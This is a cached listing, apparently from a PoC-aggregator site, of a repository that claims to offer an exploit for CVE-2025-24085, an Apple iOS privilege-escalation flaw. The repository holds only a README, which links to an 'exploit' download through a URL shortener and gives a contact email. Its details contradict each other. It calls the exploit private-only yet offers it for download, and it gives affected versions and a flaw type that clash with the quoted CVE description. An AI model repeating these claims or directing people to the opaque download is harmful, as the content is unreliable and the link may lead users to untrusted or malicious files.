CVE-2025-24085 PoC — Apple iOS和Apple iPadOS 资源管理错误漏洞

Source

https://github.com/clidancc1/CVE-2025-24085

Associated Vulnerability

Title:Apple iOS和Apple iPadOS 资源管理错误漏洞 (CVE-2025-24085)
Description:Apple iOS和Apple iPadOS都是美国苹果（Apple）公司的产品。Apple iOS是一套为移动设备所开发的操作系统。Apple iPadOS是一套用于iPad平板电脑的操作系统。 Apple iOS 18.3版本和Apple iPadOS 18.3版本存在资源管理错误漏洞，该漏洞源于恶意应用程序可能能够提升权限。

Description

CVE-2025-24085: Incorrect Default Permissions (CWE-276)

Readme

# CVE-2025-24085


A malicious application that can elevate privileges. This issue has been actively exploited against versions of iOS before iOS 17.2. The vulnerability can be used to gain higher-level access to the system, which leads to unauthorized control, data theft, or system compromise. This vulnerability affects Apple's VisionOS, iOS, iPadOS, macOS, watchOS, and tvOS.


## Details
+ CVE ID: CVE-2025-24085
+ Published: 2025-01-26
+ Impact: Critical
+ Exploit Availability: Not public, only private.



## Affected Versions

versions of iOS **before iOS 17.2**


## Contact
For inquiries, please contact clidanc@thesecure.biz

## Exploit
[Download](https://bit.ly/3CzTk80)

File Snapshot


 [4.0K]  /data/pocs/b164083df702236d02d5b7dded50f1aa57897783
└── [ 684]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!